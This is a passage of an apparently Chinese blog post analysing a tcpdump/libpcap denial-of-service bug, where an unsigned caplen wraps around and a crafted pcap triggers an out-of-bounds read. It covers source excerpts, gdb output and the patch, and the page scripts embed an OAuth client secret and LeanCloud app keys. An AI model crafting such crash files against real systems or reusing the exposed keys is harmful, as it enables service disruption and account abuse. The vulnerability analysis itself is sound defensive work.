h-> ts);< / span > < br > < span class = "line" > 9. print_info = (struct print_info *)user;< / span > < br > < span class = "line" > 10. /*< / span > < br > < span class = "line" > 11. 
* Some printers want to check that they' re not walking off the< / span > < br > < span class = "line" > 12. * end of the packet.< / span > < br > < span class = "line" > 13. * Rather than pass it all the way down, we set this global.< / span > < br > < span class = "line" > 14. */< / span > < br > < span class = "line" > 15. snapend = sp + h-> caplen;< / span > < br > < span class = "line" > 16. if(print_info-> ndo_type) { < / span > < br > < span class = "line" > 17. hdrlen = (*print_info-> p.ndo_printer)(print_info-> ndo, h, sp);< ====< / span > < br > < span class = "line" > 18. } else { < / span > < br > < span class = "line" > 19. hdrlen = (*print_info-> p.printer)(h, sp);< / span > < br > < span class = "line" > 20. } < / span > < br > < span class = "line" > 21. putchar(' n' );< / span > < br > < span class = "line" > 22. --infodelay;< / span > < br > < span class = "line" > 23. if (infoprint)< / span > < br > < span class = "line" > 24. info(0);} < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 同样设置断点看该函数是如何调用执行的< / p >
<p>这时我们可以根据call的信息, 计算出调用的函数名</p>
< p > 其中(*print_info-> p.ndo_printer)(print_info-> ndo,h,sp)指向ieee802_15_4_if_print< / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < span class = "line" > 37< / span > < br > < span class = "line" > 38< / span > < br > < span class = "line" > 39< / span > < br > < span class = "line" > 40< / span > < br > < span class = "line" > 41< / span > < br > < span class = "line" > 42< / span > < br > < span class = "line" > 43< / span > < br > < span class = "line" > 44< / 
span > < br > < span class = "line" > 45< / span > < br > < span class = "line" > 46< / span > < br > < span class = "line" > 47< / span > < br > < span class = "line" > 48< / span > < br > < span class = "line" > 49< / span > < br > < span class = "line" > 50< / span > < br > < span class = "line" > 51< / span > < br > < span class = "line" > 52< / span > < br > < span class = "line" > 53< / span > < br > < span class = "line" > 54< / span > < br > < span class = "line" > 55< / span > < br > < span class = "line" > 56< / span > < br > < span class = "line" > 57< / span > < br > < span class = "line" > 58< / span > < br > < span class = "line" > 59< / span > < br > < span class = "line" > 60< / span > < br > < span class = "line" > 61< / span > < br > < span class = "line" > 62< / span > < br > < span class = "line" > 63< / span > < br > < span class = "line" > 64< / span > < br > < span class = "line" > 65< / span > < br > < span class = "line" > 66< / span > < br > < span class = "line" > 67< / span > < br > < span class = "line" > 68< / span > < br > < span class = "line" > 69< / span > < br > < span class = "line" > 70< / span > < br > < span class = "line" > 71< / span > < br > < span class = "line" > 72< / span > < br > < span class = "line" > 73< / span > < br > < span class = "line" > 74< / span > < br > < span class = "line" > 75< / span > < br > < span class = "line" > 76< / span > < br > < span class = "line" > 77< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 25. u_int< / span > < br > < span class = "line" > 26. ieee802_15_4_if_print(struct netdissect_options *ndo,< / span > < br > < span class = "line" > 27. const struct pcap_pkthdr *h, const u_char *p)< / span > < br > < span class = "line" > 28. { < / span > < br > < span class = "line" > 29. printf(" address : %x\n" ,p);< / span > < br > < span class = "line" > 30. 
u_int caplen = h-> caplen; //传入的caplen, 赋值给无符号整形变量caplen,且该值为8< / span > < br > < span class = "line" > 31. int hdrlen;< / span > < br > < span class = "line" > 32. u_int16_t fc;< / span > < br > < span class = "line" > 33. u_int8_t seq;< / span > < br > < span class = "line" > 34. if (caplen < 3) { //不满足< / span > < br > < span class = "line" > 35. ND_PRINT((ndo, " [|802.15.4] %x" , caplen));< / span > < br > < span class = "line" > 36. return caplen;< / span > < br > < span class = "line" > 37. } < / span > < br > < span class = "line" > 38. fc = EXTRACT_LE_16BITS(p);< / span > < br > < span class = "line" > 39. hdrlen = extract_header_length(fc);< / span > < br > < span class = "line" > 40. seq = EXTRACT_LE_8BITS(p + 2);< / span > < br > < span class = "line" > 41. p += 3;< / span > < br > < span class = "line" > 42. caplen -= 3;//此时caplen = 5< / span > < br > < span class = "line" > 43. ND_PRINT((ndo," IEEE 802.15.4 %s packet " , ftypes[fc & 0x7]));< / span > < br > < span class = "line" > 44. if (vflag)< / span > < br > < span class = "line" > 45. ND_PRINT((ndo," seq %02x " , seq));< / span > < br > < span class = "line" > 46. if (hdrlen == -1) { < / span > < br > < span class = "line" > 47. ND_PRINT((ndo," malformed! " ));< / span > < br > < span class = "line" > 48. return caplen;< / span > < br
<p>传入的第二个值是struct pcap_pkthdr *h结构体, 函数使用的参数caplen就是结构体中的caplen, 不难看出, caplen进行一些加减操作后, 没有检查是否发生回绕(caplen是无符号数), 直接丢给了下一个函数使用。<br>直接跟进函数, 看看最后赋值情况</p>
<p>从源码和调试信息可以看到libpcap在处理不正常包时不严谨, 导致包的头长度hdrlen竟然大于捕获包长度caplen, 并且在处理时又没有相关的判断。hdrlen和caplen都是非负整数, 而caplen是无符号数(u_int), 减去比它大的hdrlen后会回绕成一个很大的值, 导致caplen==0xfffffff3过长。<br>继续跟进hex_and_ascii_print(ndo_default_print)</p>
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. void< / span > < br > < span class = "line" > 2. hex_and_ascii_print(register const char *ident, register const u_char *cp,< / span > < br > < span class = "line" > 3. register u_int length)< / span > < br > < span class = "line" > 4. { < / span > < br > < span class = "line" > 5. hex_and_ascii_print_with_offset(ident, cp, length, 0);< / span > < br > < span class = "line" > 6. 
} < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > 其中length==0xfffffff3, 继续执行< / span > < br > < span class = "line" > 1. void< / span > < br > < span class = "line" > 2. hex_print_with_offset(register const char *ident, register const u_char *cp, register u_int length,< / span > < br > < span class = "line" > 3. register u_int oset)< / span > < br > < span class = "line" > 4. { < / span > < br > < span class = "line" > 5. register u_int i, s;< / span > < br > < span class = "line" > 6. register int nshorts;< / span > < br > < span class = "line" > 7.< / span > < br > < span class = "line" > 8. nshorts = (u_int) length / sizeof(u_short);< / span > < br > < span class = "line" > 9. i = 0;< / span > < br > < span class = "line" > 10. while (--nshorts > = 0) { < / span > < br > < span class = "line" > 11. if ((i++ % 8) == 0) { < / span > < br > < span class = "line" > 12. (void)printf(" %s0x%04x: " , ident, oset);< / span > < br > < span class = "line" > 13. oset += HEXDUMP_BYTES_PER_LINE;< / span > < br > < span class = "line" > 14. } < / span > < br > < span class = "line" > 15. s = *cp++; < ======= 抛出错误位置< / span > < br > < span class = "line" > 16. (void)printf(" %02x%02x" , s, *cp++);< / span > < br > < span class = "line" > 17. } < / span > < br > < span class = "line" > 18. if (length & 1) { < / span > < br > < span class = "line" > 19. if ((i % 8) == 0)< / span > < br > < span class = "line" > 20. (void)printf(" %s0x%04x: " , ident, oset);< / span > < br > < span class = "line" > 21. (void)printf(" %02x" , *cp);< / span > < br > < span class = "line" > 22. } < / span > < br > < span class = "line" > nshorts=(u_int) length / sizeof(u_short) => nshorts=0xfffffff3/2= 7FFFFFF9 < / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 但数据包数据没有这么长, 导致了crash。< / p >
<h3 id="3-内存分析"><a href="#3-内存分析" class="headerlink" title="3.内存分析"></a>3.内存分析</h3><p>仔细分析之后发现, 通过len判断的这个长度并没有进行控制, 如果是自己构造的一个超长len的数据包, 则会连续读取到不可估计的值。<br>通过查看ebx的值来看一下这段内存到底开辟到什么位置<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1. gdb-peda$ x/10000000x 0x81e33bd</span><br><span class="line">2. 0x8203fdd: 0x00000000 0x00000000 0x00000000 0x00000000</span><br><span class="line">3. 0x8203fed: 0x00000000 0x00000000 0x00000000 0x00000000</span><br><span class="line">4. 0x8203ffd: Cannot access memory at address 0x8204000</span><br></pre></td></tr></table></figure></p>
<p>可以看到, 到达0x8204000附近的时候, 就是无法读取的无效地址了, 而初始值为0x81e33bd, 用两个值相减: 0x8204000-0x81e33bd = 0x20c40, 因为ebx+ebp*2+0x1一次读取两个字节, 那么循环计数器就要除以2, 最后结果为0x10620。<br>来看一下到达拒绝服务位置读取的长度: EBX: 0x81e33bd --> 0x0; EBP: 0x10621;<br>EBP刚好为0x10621, 正是不可读取内存空间的地址, 因此造成拒绝服务。</p>
< h3 id = "4-漏洞总结" > < a href = "#4-漏洞总结" class = "headerlink" title = "4.漏洞总结" > < / a > 4.漏洞总结< / h3 > < p > 总结一下整个漏洞触发过程, 首先tcpdump会读取恶意构造的pcap包, 在构造pcap包的时候, 设置一个超长的数据包长度, tcpdump会根据len的长度去读取保存在内存空间数据包的内容, 当引用到不可读取内存位置时, 会由于引用不可读指针, 造成拒绝服务漏洞。< / p >
< h2 id = "五、漏洞修补" > < a href = "#五、漏洞修补" class = "headerlink" title = "五、漏洞修补" > < / a > 五、漏洞修补< / h2 > < p > Libpcap依然是apt安装的默认版本, tcpdump使用4.7 .0-bp版本< br > 在hex_and_ascii_print_with_offset中增加对caplength的判断< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. caplength = (ndo-> ndo_snapend > = cp) ? ndo-> ndo_snapend - cp : 0;< / span > < br > < span class = "line" > 2. if (length > caplength)< / span > < br > < span class = "line" > 3. length = caplength;< / span > < br > < span class = "line" > 4. nshorts = length / sizeof(u_short);< / span > < br > < span class = "line" > 5. i = 0;< / span > < br > < span class = "line" > 6. hsp = hexstuff; asp = asciistuff;< / span > < br > < span class = "line" > 7. while (--nshorts > = 0) { < / span > < br > < span class = "line" > 8. ...< / span > < br > < span class = "line" > 9. } < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
<p>可以看到执行完caplength = (ndo->ndo_snapend >= cp) ? ndo->ndo_snapend - cp : 0;之后, caplength为0, 继续执行, 可以推出length同样为0, 到这里已经不会发生错误了。</p>
< p > 参考< br > < a href = "https://www.exploit-db.com/exploits/39875/" target = "_blank" rel = "noopener" > exploit-db payload< / a > < br > < a href = "https://whereisk0shl.top/post/2016-10-23-1" target = "_blank" rel = "noopener" > WHEREISK0SHL分析博客< / a > < br > < a href = "https://github.com/the-tcpdump-group" target = "_blank" rel = "noopener" > libpcap/tcpdump源码< / a > < / p >
< / div >
< / div >
< / article >
< / div >
< / div >
< div class = "comments" id = "comments" >
< div id = "gitment-container" > < / div >
< / div >
< / div >
< / div >
< / main >
< / div >
< script type = "text/javascript" >
// Null out window.Promise when the browser's value is not a genuine function
// (presumably so a polyfill loaded later can install a real one — confirm against the loaded scripts).
(function () {
  var promiseTag = Object.prototype.toString.call(window.Promise);
  if (promiseTag !== '[object Function]') {
    window.Promise = null;
  }
})();
< / script >
<!-- Theme scripts, same-origin; executed in document order. The `type` attribute
     defaults to JavaScript, so it is omitted. -->
<script src="/lib/jquery/index.js?v=2.1.3"></script>
<script src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
<script src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
<script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
<script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
<script src="/js/src/utils.js?v=5.1.4"></script>
<script src="/js/src/motion.js?v=5.1.4"></script>
<script src="/js/src/affix.js?v=5.1.4"></script>
<script src="/js/src/schemes/pisces.js?v=5.1.4"></script>
<script src="/js/src/scrollspy.js?v=5.1.4"></script>
<script src="/js/src/post-details.js?v=5.1.4"></script>
<script src="/js/src/bootstrap.js?v=5.1.4"></script>
<!-- LOCAL: You can save these files to your site and update links -->
<!-- Third-party stylesheet and script fetched from an external origin without
     Subresource Integrity (no integrity/crossorigin attributes): whoever controls
     that host can run script in this page's origin, which also holds the Gitmint
     OAuth configuration further down. Self-hosting these files (as the LOCAL note
     suggests) or pinning them with SRI hashes would limit that exposure. -->
< link rel = "stylesheet" href = "https://aimingoo.github.io/gitmint/style/default.css" >
< script src = "https://aimingoo.github.io/gitmint/dist/gitmint.browser.js" > < / script >
<!-- END LOCAL -->
< script type = "text/javascript" >
// Mounts the Gitmint comment widget into #gitment-container, keyed by the page path.
// SECURITY: the OAuth client_secret below is delivered to every visitor as part of this
// page's source, so it cannot be treated as confidential — anyone can use it to act as
// this OAuth app. Widgets of this style require the secret client-side; keep the app's
// scopes minimal, and prefer a server-side or proxied token exchange if one is available.
function renderGitment() {
  // Widget language follows the browser; vendor-specific fallbacks cover older IE.
  var uiLang = navigator.language || navigator.systemLanguage || navigator.userLanguage;
  var options = {
    id: window.location.pathname,
    owner: 'Cool-Y',
    repo: 'gitment-comments',
    lang: uiLang,
    oauth: {
      client_secret: '1c5db4da72df5e6fc318d12afe5f4406f7c54343',
      client_id: '180955a2c3ae3d966d9a'
    }
  };
  var widget = new Gitmint(options);
  widget.render('gitment-container');
}
renderGitment();
< / script >
< script type = "text/javascript" >
// Popup Window;
// Shared state for the local search popup.
var isfetched = false;            // set to true once the search index has been downloaded
var search_path = "search.xml";   // search index file name; an empty value falls back to search.xml
if (!search_path) {
  search_path = "search.xml";
}
// The index is parsed as JSON when its name ends in .json, as XML otherwise.
var isXml = !/json$/i.test(search_path);
var path = "/" + search_path;
// monitor main search box;
// Closes the search popup: hides it, clears the query box, removes any rendered
// results, the "no result" node and the dimming overlay, then restores body scrolling.
var onPopupClose = function (event) {
  var $searchInput = $('#local-search-input');
  $('.popup').hide();
  $searchInput.val('');
  $('.search-result-list').remove();
  $('#no-result').remove();
  $(".local-search-pop-overlay").remove();
  $('body').css('overflow', '');
};
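// Opens the search popup: appends a click-to-close overlay, locks body scrolling,
// toggles the popup and focuses the query box with mobile auto-correction disabled.
function proceedsearch() {
  // The overlay markup must be a well-formed tag: the previous string had spaces inside
  // the angle brackets, which jQuery inserts as text rather than as an element, so the
  // .search-popup-overlay click handler below never had a node to attach to.
  var overlayMarkup = '<div class="search-popup-overlay local-search-pop-overlay"></div>';
  $("body")
    .append(overlayMarkup)
    .css('overflow', 'hidden');
  $('.search-popup-overlay').click(onPopupClose);
  $('.popup').toggle();
  var $localSearchInput = $('#local-search-input');
  $localSearchInput.attr("autocapitalize", "none");
  $localSearchInput.attr("autocorrect", "off");
  $localSearchInput.focus();
}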
// search function;
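// Download the local search index and wire up live searching.
//   path       - URL of the index (search.xml or a JSON index)
//   search_id  - id of the text input to watch
//   content_id - id of the element that receives the result list
// Fixes relative to the previous version: the HTML strings and operators were
// garbled; a failed download left the loading overlay (and body
// overflow:hidden) in place forever, so an ajax error handler is added;
// decodeURIComponent() on a malformed URL aborted the whole search; the
// article URL and title read from the index are now HTML-escaped before
// being concatenated into markup that is assigned to innerHTML.
var searchFunc = function(path, search_id, content_id) {
  'use strict';

  // Escape the characters significant in HTML text and attribute values.
  function escapeHtml(text) {
    return String(text)
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;')
      .replace(/"/g, '&quot;')
      .replace(/'/g, '&#39;');
  }

  // Return every non-overlapping occurrence of `word` in `text` as
  // {position, word}; an empty word yields no hits.
  function getIndexByWord(word, text, caseSensitive) {
    var wordLen = word.length;
    if (wordLen === 0) {
      return [];
    }
    if (!caseSensitive) {
      text = text.toLowerCase();
      word = word.toLowerCase();
    }
    var hits = [];
    var startPosition = 0;
    var position;
    while ((position = text.indexOf(word, startPosition)) > -1) {
      hits.push({position: position, word: word});
      startPosition = position + wordLen;
    }
    return hits;
  }

  // Render text[slice.start, slice.end) with each hit wrapped in
  // <b class="search-keyword">. Hit positions refer to the raw text, so
  // escaping (when requested) is applied to each fragment after cutting.
  function highlightKeyword(text, slice, escapeText) {
    var emit = escapeText ? escapeHtml : function (s) { return s; };
    var result = '';
    var prevEnd = slice.start;
    slice.hits.forEach(function (hit) {
      result += emit(text.substring(prevEnd, hit.position));
      var end = hit.position + hit.length;
      result += '<b class="search-keyword">' + emit(text.substring(hit.position, end)) + '</b>';
      prevEnd = end;
    });
    result += emit(text.substring(prevEnd, slice.end));
    return result;
  }

  // Remove the loading overlay and restore scrolling (success and failure).
  function stopLoading() {
    $(".local-search-pop-overlay").remove();
    $('body').css('overflow', '');
  }

  // start loading animation
  $("body")
    .append('<div class="search-popup-overlay local-search-pop-overlay">' +
            '<div id="search-loading-icon">' +
            '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
            '</div>' +
            '</div>')
    .css('overflow', 'hidden');
  $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

  $.ajax({
    url: path,
    dataType: isXml ? "xml" : "json",
    async: true,
    error: function(xhr, status) {
      // Previously missing: the overlay stayed on screen after a failed download.
      stopLoading();
      console.log('Failed to load search index ' + path + ': ' + status);
    },
    success: function(res) {
      isfetched = true;
      $('.popup').detach().appendTo('.header-inner');
      // Normalise the index into [{title, content, url}] whatever its format.
      var datas = isXml ? $("entry", res).map(function() {
        return {
          title: $("title", this).text(),
          content: $("content", this).text(),
          url: $("url", this).text()
        };
      }).get() : res;
      var input = document.getElementById(search_id);
      var resultContent = document.getElementById(content_id);

      var inputEventFunction = function() {
        var searchText = input.value.trim().toLowerCase();
        var keywords = searchText.split(/[\s\-]+/);
        // The whole phrase is also searched so exact phrase hits rank higher.
        if (keywords.length > 1) {
          keywords.push(searchText);
        }
        var resultItems = [];
        if (searchText.length > 0) {
          // perform local searching
          datas.forEach(function(data) {
            var isMatch = false;
            var hitCount = 0;
            var searchTextCount = 0;
            var title = data.title.trim();
            var titleInLowerCase = title.toLowerCase();
            // Content is stored as markup; strip the tags so hit offsets refer
            // to visible text. Entities in it are left for innerHTML to decode,
            // which is why content (unlike the title) is not escaped below.
            var content = data.content.trim().replace(/<[^>]+>/g, "");
            var contentInLowerCase = content.toLowerCase();
            var articleUrl;
            try {
              articleUrl = decodeURIComponent(data.url);
            } catch (err) {
              // Malformed percent-encoding must not abort the whole search.
              articleUrl = data.url;
            }
            var indexOfTitle = [];
            var indexOfContent = [];
            // only match articles with not empty titles
            if (title != '') {
              keywords.forEach(function(keyword) {
                indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
              });
              if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                isMatch = true;
                hitCount = indexOfTitle.length + indexOfContent.length;
              }
            }
            if (!isMatch) {
              return;
            }
            // sort hits by position descending (longer word first on ties) so
            // the lowest position sits at the end of the array and can be popped
            [indexOfTitle, indexOfContent].forEach(function (index) {
              index.sort(function (itemLeft, itemRight) {
                if (itemRight.position !== itemLeft.position) {
                  return itemRight.position - itemLeft.position;
                }
                return itemLeft.word.length - itemRight.word.length;
              });
            });
            // Consume hits from the end of `index` while they fit inside
            // [start, end], dropping hits that overlap an accepted one.
            // Also counts whole-phrase hits into the enclosing searchTextCount.
            function mergeIntoSlice(start, end, index) {
              var item = index[index.length - 1];
              var position = item.position;
              var word = item.word;
              var hits = [];
              var searchTextCountInSlice = 0;
              while (position + word.length <= end && index.length != 0) {
                if (word === searchText) {
                  searchTextCountInSlice++;
                }
                hits.push({position: position, length: word.length});
                var wordEnd = position + word.length;
                // move to next position of hit
                index.pop();
                while (index.length != 0) {
                  item = index[index.length - 1];
                  position = item.position;
                  word = item.word;
                  if (wordEnd > position) {
                    index.pop();
                  } else {
                    break;
                  }
                }
              }
              searchTextCount += searchTextCountInSlice;
              return {
                hits: hits,
                start: start,
                end: end,
                searchTextCount: searchTextCountInSlice
              };
            }
            var slicesOfTitle = [];
            if (indexOfTitle.length != 0) {
              slicesOfTitle.push(mergeIntoSlice(0, title.length, indexOfTitle));
            }
            var slicesOfContent = [];
            while (indexOfContent.length != 0) {
              var item = indexOfContent[indexOfContent.length - 1];
              var position = item.position;
              var word = item.word;
              // cut out about 100 characters around the hit
              var start = position - 20;
              var end = position + 80;
              if (start < 0) {
                start = 0;
              }
              if (end < position + word.length) {
                end = position + word.length;
              }
              if (end > content.length) {
                end = content.length;
              }
              slicesOfContent.push(mergeIntoSlice(start, end, indexOfContent));
            }
            // sort slices in content by search text's count and hits' count
            slicesOfContent.sort(function (sliceLeft, sliceRight) {
              if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                return sliceRight.searchTextCount - sliceLeft.searchTextCount;
              } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                return sliceRight.hits.length - sliceLeft.hits.length;
              }
              return sliceLeft.start - sliceRight.start;
            });
            // select top N slices in content (theme setting rendered as 1;
            // a negative value would keep all slices)
            var upperBound = 1;
            if (upperBound >= 0) {
              slicesOfContent = slicesOfContent.slice(0, upperBound);
            }
            // build the result entry; URL and title come from the index and are
            // escaped before being concatenated into markup
            var hrefAttr = "href='" + escapeHtml(articleUrl) + "'";
            var resultItem = "<li><a " + hrefAttr + " class='search-result-title'>";
            if (slicesOfTitle.length != 0) {
              resultItem += highlightKeyword(title, slicesOfTitle[0], true);
            } else {
              resultItem += escapeHtml(title);
            }
            resultItem += "</a>";
            slicesOfContent.forEach(function (slice) {
              resultItem += "<a " + hrefAttr + ">" +
                "<p class=\"search-result\">" + highlightKeyword(content, slice, false) +
                "...</p></a>";
            });
            resultItem += "</li>";
            resultItems.push({
              item: resultItem,
              searchTextCount: searchTextCount,
              hitCount: hitCount,
              id: resultItems.length
            });
          });
        }
        if (keywords.length === 1 && keywords[0] === "") {
          resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x"></i></div>';
        } else if (resultItems.length === 0) {
          resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x"></i></div>';
        } else {
          // most phrase hits first, then most keyword hits, then latest index entry
          resultItems.sort(function (resultLeft, resultRight) {
            if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
              return resultRight.searchTextCount - resultLeft.searchTextCount;
            } else if (resultLeft.hitCount !== resultRight.hitCount) {
              return resultRight.hitCount - resultLeft.hitCount;
            }
            return resultRight.id - resultLeft.id;
          });
          var searchResultList = '<ul class="search-result-list">';
          resultItems.forEach(function (result) {
            searchResultList += result.item;
          });
          searchResultList += "</ul>";
          resultContent.innerHTML = searchResultList;
        }
      };
      // The theme's trigger setting was rendered as 'auto' (search while
      // typing); the manual icon/Enter-key branch it replaced was unreachable.
      input.addEventListener('input', inputEventFunction);
      // remove loading animation and open the popup
      stopLoading();
      proceedsearch();
    }
  });
};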
// handle and trigger popup window;
// Open the popup: the first open downloads the index, later opens reuse it.
$('.popup-trigger').click(function(e) {
  e.stopPropagation();
  if (isfetched) {
    proceedsearch();
  } else {
    searchFunc(path, 'local-search-input', 'local-search-result');
  }
});
$('.popup-btn-close').click(onPopupClose);
// Clicks inside the popup must not reach the overlay/document handlers.
$('.popup').click(function(e) {
  e.stopPropagation();
});
// Escape dismisses the popup while it is visible.
$(document).on('keyup', function (event) {
  var escPressed = event.which === 27;
  if (escPressed && $('.search-popup').is(':visible')) {
    onPopupClose();
  }
});
</script>
<script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
<script>AV.initialize("EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz", "x8FxDrYG79C8YFrTww9ljo8K");</script>
<script>
// Fill the visitor count of every .leancloud_visitors element (keyed by its
// id, which holds the page URL) from the Counter table; elements with no
// stored row show 0.
function showTime(Counter) {
  var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
  var $visitors = $(".leancloud_visitors");
  var entries = $visitors.map(function () {
    return $(this).attr("id").trim();
  }).get();
  var query = new AV.Query(Counter);
  query.containedIn('url', entries);
  query.find()
    .done(function (results) {
      if (results.length === 0) {
        $visitors.find(COUNT_CONTAINER_REF).text(0);
        return;
      }
      for (var i = 0; i < results.length; i++) {
        var record = results[i];
        var target = document.getElementById(record.get('url'));
        $(target).find(COUNT_CONTAINER_REF).text(record.get('time'));
      }
      // Pages that have no row yet still get an explicit 0.
      for (var j = 0; j < entries.length; j++) {
        var countSpan = $(document.getElementById(entries[j])).find(COUNT_CONTAINER_REF);
        if (countSpan.text() == '') {
          countSpan.text(0);
        }
      }
    })
    .fail(function (object, error) {
      console.log("Error: " + error.code + " " + error.message);
    });
}
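// Increment (or create) the Counter row for the current page and display the
// resulting value. This runs unauthenticated in the browser and new rows get
// a public-write ACL, so the count is informational only: any visitor can
// rewrite it. Missing id/data-flag-title attributes previously threw on
// .trim(); they now fall back to ''.
function addCount(Counter) {
  var $visitors = $(".leancloud_visitors");
  var url = ($visitors.attr('id') || '').trim();
  var title = ($visitors.attr('data-flag-title') || '').trim();

  // Write the saved record's count into the page.
  function showCount(record) {
    var $element = $(document.getElementById(url));
    $element.find('.leancloud-visitors-count').text(record.get('time'));
  }

  var query = new AV.Query(Counter);
  query.equalTo("url", url);
  query.find({
    success: function(results) {
      if (results.length > 0) {
        var counter = results[0];
        // presumably so the object returned by save() carries the
        // server-side value after the increment — confirm against the SDK
        counter.fetchWhenSave(true);
        counter.increment("time");
        counter.save(null, {
          success: showCount,
          error: function(counter, error) {
            console.log('Failed to save Visitor num, with error message: ' + error.message);
          }
        });
      } else {
        var newcounter = new Counter();
        /* Set ACL: world-readable and world-writable, so that later
           anonymous visitors can increment the row from the browser. */
        var acl = new AV.ACL();
        acl.setPublicReadAccess(true);
        acl.setPublicWriteAccess(true);
        newcounter.setACL(acl);
        /* End Set ACL */
        newcounter.set("title", title);
        newcounter.set("url", url);
        newcounter.set("time", 1);
        newcounter.save(null, {
          success: showCount,
          error: function(newcounter, error) {
            console.log('Failed to create', error);
          }
        });
      }
    },
    error: function(error) {
      console.log('Error:' + error.code + " " + error.message);
    }
  });
}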
// On DOM ready pick the counter mode: exactly one .leancloud_visitors element
// (presumably a single post page) records a visit; more than one
// .post-title-link (presumably an index page) only displays counts.
$(function() {
  var Counter = AV.Object.extend("Counter");
  var isSinglePost = $('.leancloud_visitors').length == 1;
  if (isSinglePost) {
    addCount(Counter);
    return;
  }
  if ($('.post-title-link').length > 1) {
    showTime(Counter);
  }
});
</script>
</body>
</html>